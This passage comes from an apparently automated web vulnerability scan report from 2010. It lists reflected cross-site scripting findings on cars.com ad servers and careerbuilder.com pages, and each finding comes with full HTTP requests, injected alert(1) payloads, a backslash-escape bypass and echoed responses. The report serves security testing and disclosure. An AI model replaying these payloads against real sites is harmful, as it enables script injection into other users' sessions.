document.writeln("<iframe src=\"http://acc.cars.com/accipiter/adclick/CID=00026a3764e3f66300000000c0050\\";alert(1)//7ed6d85a66a/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261/relocate=http://open.ad.yieldmanager.net/a1?pubId=23449523269&site=Miami%20Her
...[SNIP]...

2.10. http://acc.cars.com/jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 40578\"%3balert(1)//3b419f8cdbf was submitted in the REST URL parameter 2. This input was echoed as 40578\\";alert(1)//3b419f8cdbf in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserver/acc_random40578\"%3balert(1)//3b419f8cdbf=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261 HTTP/1.1
Host: acc.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:19 GMT
X-DirectServer: cvcars_DS1
Content-Type: application/x-javascript
Content-Length: 609
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<iframe src=\"http://acc.cars.com/accipiter/adclick/CID=00026a3764e3f66300000000/acc_random40578\\";alert(1)//3b419f8cdbf=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261/relocate=http://open.ad.yieldmanager.net/a1?pubId=23449523269&site=Miami%20Herald&cntTy=i
...[SNIP]...

2.11. http://acc.cars.com/jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71a4e\"%3balert(1)//11eb5132b70 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 71a4e\\";alert(1)//11eb5132b70 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserver/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261?71a4e\"%3balert(1)//11eb5132b70=1 HTTP/1.1
Host: acc.cars.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: GUID=0003D7DE875B0CE05C2B7F3061626364; cars_persist=3863024812.20480.0000;

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 02:43:46 GMT
X-DirectServer: cvcars_DS0
Content-Type: application/x-javascript
Content-Length: 612
Pragma: no-cache
Cache-control: no-cache
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<iframe src=\"http://acc.cars.com/accipiter/adclick/CID=00026a3764e3f66300000000/acc_random=1289774564334/SITE=CARS.COM/AAMSZ=160x600/ACCDETAIL=leftrailad_1/AFF=herald/AREA=homepage/pageid=1289774564261?71a4e\\";alert(1)//11eb5132b70=1&relocate=http://open.ad.yieldmanager.net/a1?pubId=23449523269&site=Miami%20Herald&cntTy=iframe&rTy=ac&sz=160x600&cTopId=20254501&V=2&cCat=Cars_Front&cSctn=vendor&rFrame=1&fmt=standard%20graphical&cD
...[SNIP]...

2.12. http://acc.cars.com/jserver/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3e45a\"%3balert(1)//cb7a68796a2 was submitted in the REST URL parameter 1. This input was echoed as 3e45a\\";alert(1)//cb7a68796a2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserver3e45a\"%3balert(1)//cb7a68796a2/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248 HTTP/1.1
Accept: */*
Referer: http://www.cars.com/go/about/us.jsp?aff=herald&section=H&content=cont
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: acc.cars.com
Proxy-Connection: Keep-Alive
Cookie: cars_persist=3863024812.20480.0000; GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:08 GMT
X-DirectServer: cvcars_DS2
Content-Type: application/x-javascript
Content-Length: 1046
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=0002ECB27CF40CE06826B99361626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=acc.cars.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<SCRIPT language='JavaScript1.1' SRC=\"http://ad.vulnerable.ad.partner/adj/N4441.cars1/B4653657.2;sz=728x90;click=http://acc.cars.com/accipiter/adclick/CID=00038b062dd5e235000000003e45a\\";alert(1)//cb7a68796a2/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248/relocate=;ord=1289774580251?\">
...[SNIP]...

2.13. http://acc.cars.com/jserver/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d3eec\"%3balert(1)//f976d163c71 was submitted in the REST URL parameter 2. This input was echoed as d3eec\\";alert(1)//f976d163c71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserver/acc_randomd3eec\"%3balert(1)//f976d163c71=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248 HTTP/1.1
Accept: */*
Referer: http://www.cars.com/go/about/us.jsp?aff=herald&section=H&content=cont
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: acc.cars.com
Proxy-Connection: Keep-Alive
Cookie: cars_persist=3863024812.20480.0000; GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:10 GMT
X-DirectServer: cvcars_DS1
Content-Type: application/x-javascript
Content-Length: 1007
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=0003B6107CF60CE04977032061626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=acc.cars.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<SCRIPT language='JavaScript1.1' SRC=\"http://ad.vulnerable.ad.partner/adj/N4441.cars1/B4653657.2;sz=728x90;click=http://acc.cars.com/accipiter/adclick/CID=00038b062dd5e23500000000/acc_randomd3eec\\";alert(1)//f976d163c71=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248/relocate=;ord=?\">
...[SNIP]...

2.14. http://acc.cars.com/jserver/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://acc.cars.com
Path:   /jserver/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7f4a5\"%3balert(1)//96265a28453 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7f4a5\\";alert(1)//96265a28453 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string, the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /jserver/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248?7f4a5\"%3balert(1)//96265a28453=1 HTTP/1.1
Accept: */*
Referer: http://www.cars.com/go/about/us.jsp?aff=herald&section=H&content=cont
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: acc.cars.com
Proxy-Connection: Keep-Alive
Cookie: cars_persist=3863024812.20480.0000; GUID=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF

Response

HTTP/1.1 200 OK
Server: Atlas-AdManager-DirectServer/10.3.7.2 (Red Hat Linux Enterprise 4; X86)
Date: Mon, 15 Nov 2010 00:21:06 GMT
X-DirectServer: cvcars_DS2
Content-Type: application/x-javascript
Content-Length: 1052
Pragma: no-cache
Cache-control: no-cache
Set-Cookie: GUID=000E8A457CF10CE04AD8E1D861626364; expires=Sun, 29-Feb-2012 23:59:59 GMT; path=/; domain=acc.cars.com
P3P: CP="NOI NID ADMa PSAa OUR BUS COM NAV"
Connection: close

document.writeln("<SCRIPT language='JavaScript1.1' SRC=\"http://ad.vulnerable.ad.partner/adj/N4441.cars1/B4653657.2;sz=728x90;click=http://acc.cars.com/accipiter/adclick/CID=00038b062dd5e23500000000/acc_random=1289774580251/SITE=CARS.COM/AAMSZ=728x90/AFF=herald/AREA=about.H/pageid=1289774580248?7f4a5\\";alert(1)//96265a28453=1&relocate=;ord=1289774580251?\">
...[SNIP]...

2.15. http://accounting.careerbuilder.com/ [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51115"%20a%3db%20d5b4f13e8c1 was submitted in the lr parameter. This input was echoed as 51115" a=b d5b4f13e8c1 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /?lr=cbcb_mhf48aa51115"%20a%3db%20d5b4f13e8c1 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 235413
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
X-Powered-By: ASP.NET
X-PBY: BEAR35
Date: Sun, 14 Nov 2010 23:28:14 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Accoun
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa51115" a=b d5b4f13e8c1" />
...[SNIP]...

2.16. http://accounting.careerbuilder.com/ag.ic/Florida/ [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida/

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 270f0"%20a%3db%20e3d0cbef4fe was submitted in the lr parameter. This input was echoed as 270f0" a=b e3d0cbef4fe in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida/?lr=cbcb_mhf48aa270f0"%20a%3db%20e3d0cbef4fe HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 195258
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR10
Date: Sun, 14 Nov 2010 23:08:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Florid
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa270f0" a=b e3d0cbef4fe" />
...[SNIP]...

2.17. http://accounting.careerbuilder.com/ag.ic/Florida/ [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 53581'-alert(1)-'707915ba59b was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida/?lr=cbcb_mhf48aa53581'-alert(1)-'707915ba59b HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 196172
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: :mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR35
Date: Sun, 14 Nov 2010 23:12:04 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Florid
...[SNIP]...
ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa53581'-alert(1)-'707915ba59b&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.18. http://accounting.careerbuilder.com/ag.ic/Florida_Miami [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cca06'%3b229e8665375 was submitted in the REST URL parameter 2. This input was echoed as cca06';229e8665375 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miamicca06'%3b229e8665375?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&sc=1&ff=21&excrit=QID=A3853799236048;st=a;use=ALL;TID=0;CTY=Miami;SID=FL;CID=US;ENR=NO;DTP=DRNS;YDI=YES;IND=ALL;PDQ=All;PDQ=All;PAYL=0;PAYH=gt120;POY=NO;ETD=ALL;RE=ALL;MGT=DC;SUP=DC;FRE=30;CHL=ag;QS=sid_unknown;SS=NO;TITL=0;OB=-modifiedint;RAD=30;JQT=RAD;JDV=False;ExpHigh=gt50;ExpLow=0;MaxLowExp=-1 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 193512
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miamicca06';229e8665375:mxdl41=pg=1&sc=1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR8
Date: Sun, 14 Nov 2010 23:17:55 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miamic
...[SNIP]...
<script language="JavaScript">
var googlekw = 'Miamicca06';229E8665375 Accounting Jobs on CareerBuilder.com';
</script>
...[SNIP]...

2.19. http://accounting.careerbuilder.com/ag.ic/Florida_Miami [lr parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami

Issue detail

The value of the lr request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 58a13"%20a%3db%207e7fcc80efe was submitted in the lr parameter. This input was echoed as 58a13" a=b 7e7fcc80efe in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /ag.ic/Florida_Miami?lr=cbcb_mhf48aa58a13"%20a%3db%207e7fcc80efe HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 191257
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR44
Date: Sun, 14 Nov 2010 23:05:15 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
<input name="lr" type="hidden" value="cbcb_mhf48aa58a13" a=b 7e7fcc80efe" />
...[SNIP]...

2.20. http://accounting.careerbuilder.com/ag.ic/Florida_Miami [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59906'-alert(1)-'795c61b5e19 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami?lr=cbcb_mhf48aa59906'-alert(1)-'795c61b5e19 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BID=X13ACF19327AEAC65072116A0EEB7368F916169A12E907F8C06BE387AC4A5AFD3A02B5F3087AB74F54A9922BF4B57C0A12; PU=0; CB%5FSID=a839a7c1d4f149f0a63fe152456c56b4-343070815-TW-4; :mxdl41=pg=1&sc=-1&sd=0;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 191944
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CURa IVAa HISa OUR IND UNI COM NAV INT STA",policyref="http://img.icbdr.com/images/CBP3P.xml"
Set-Cookie: florida_miami:mxdl41=pg=1&sc=-1&sd=0; path=/
X-Powered-By: ASP.NET
X-PBY: BEAR4
Date: Sun, 14 Nov 2010 23:06:10 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html id="HTMLTag" xml:lang="en-US" lang="en-US">
<head><title>
   Miami
...[SNIP]...
ntroHTML = 'The feature you requested is only available to members. Please sign in to continue...';
CB.AJAX.Login._registerURL = 'https://www.careerbuilder.com/Share/Register.aspx?lr=cbcb_mhf48aa59906'-alert(1)-'795c61b5e19&ff=21';
CB.AJAX.Login._siteDownHTML = "You must be logged in to use this feature, but Login is currently unavailable while we perform necessary maintenance. Please try again later.";
CB.AJAX
...[SNIP]...

2.21. http://accounting.careerbuilder.com/ag.ic/Florida_Miami/ [lr parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://accounting.careerbuilder.com
Path:   /ag.ic/Florida_Miami/

Issue detail

The value of the lr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f48aa'-alert(1)-'9d78db8d0a5 was submitted in the lr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ag.ic/Florida_Miami/?lr=cbcb_mhf48aa'-alert(1)-'9d78db8d0a5&SiteID=cbcb_mh031 HTTP/1.1
Host: accounting.careerbuilder.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 190697
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Server: Microsoft-IIS/7.0
